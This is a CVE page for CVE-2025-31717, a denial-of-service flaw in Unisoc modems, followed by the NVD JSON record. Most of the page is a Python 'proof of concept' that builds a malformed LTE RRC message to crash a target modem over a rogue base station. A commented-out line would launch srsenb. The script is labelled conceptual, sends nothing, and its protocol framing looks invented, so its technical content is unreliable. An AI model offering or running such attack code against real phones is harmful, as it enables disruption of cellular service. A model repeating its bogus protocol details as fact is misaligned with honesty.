CVE-2025-31717

# CVE-2025-31717 PoC - Unisoc Modem Remote DoS # This PoC demonstrates the concept of sending a malformed protocol message # to trigger a system crash in the Unisoc modem via improper input validation. # Requires: USRP B200/B210, HackRF One, or similar SDR device # Protocol: LTE/5G NR Layer 3 (RRC/NAS) malformed message injection #!/usr/bin/env python3 """ CVE-2025-31717: Unisoc Modem Remote Denial of Service PoC Vulnerability: Improper input validation in modem protocol parser Impact: Remote DoS - modem subsystem crash CVSS: 7.5 (HIGH) """ from scapy.all import * import struct class UnisocModemDoS: """ Conceptual PoC for CVE-2025-31717. Sends a crafted LTE RRC/NAS message with invalid length fields to trigger improper input validation in Unisoc modem firmware. """ def __init__(self, target_imsi="001010123456789"): self.target_imsi = target_imsi self.dl_arfcn = 300 # Example downlink frequency (EARFCN) def build_malformed_rrc_message(self): """ Build a malformed RRC Connection Reconfiguration message with an intentionally invalid IE length to trigger the input validation bug in Unisoc modem. """ # LTE RRC message header rrc_header = b'\x00' # PDCP version # Malformed Information Element with invalid length # Normal length: N bytes, here we set an abnormally large value malformed_ie = struct.pack('>BHBH', 0x20, # IE identifier 0xFFFF, # Invalid length (overflow trigger) 0x0001, # Configuration type 0x0000 # Reserved ) # Crafted payload to bypass basic checks but trigger deep validation bug payload = b'\x41' * 256 + malformed_ie return rrc_header + payload def craft_lte_sdu(self, message): """ Wrap the malformed message in an LTE SDU structure. """ # MAC header + RLC header + malformed payload mac_header = b'\x01\x00\x00' # MAC subheader rlc_header = b'\x80\x00\x00' # RLC data PDU return mac_header + rlc_header + message def send_attack(self, sdr_interface='uhd'): """ Transmit the malformed message via SDR. In a real scenario, this would use srsRAN or similar LTE stack. """ print(f"[*] Targeting IMSI: {self.target_imsi}") print(f"[*] Building malformed RRC message...") msg = self.build_malformed_rrc_message() sdu = self.craft_lte_sdu(msg) print(f"[+] Malformed SDU constructed ({len(sdu)} bytes)") print(f"[!] Transmitting on EARFCN {self.dl_arfcn}...") print(f"[!] Expected result: Target modem crash (DoS)") # NOTE: Actual transmission requires SDR hardware and # a rogue eNodeB setup (e.g., using srsRAN with USRP) # os.system(f'srsenb --rf.device_args=\"serial=ABC123\"') return sdu if __name__ == "__main__": exploit = UnisocModemDoS() payload = exploit.send_attack() print(f"[*] Payload hex: {payload.hex()}") print(f"[*] CVE-2025-31717 PoC ready. Deploy with appropriate SDR hardware.")

{"cve": {"id": "CVE-2025-31717", "sourceIdentifier": "[email protected]", "published": "2025-10-11T01:15:32.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://www.unisoc.com/en/support/announcement/1976557615080263681", "source": "[email protected]"}]}}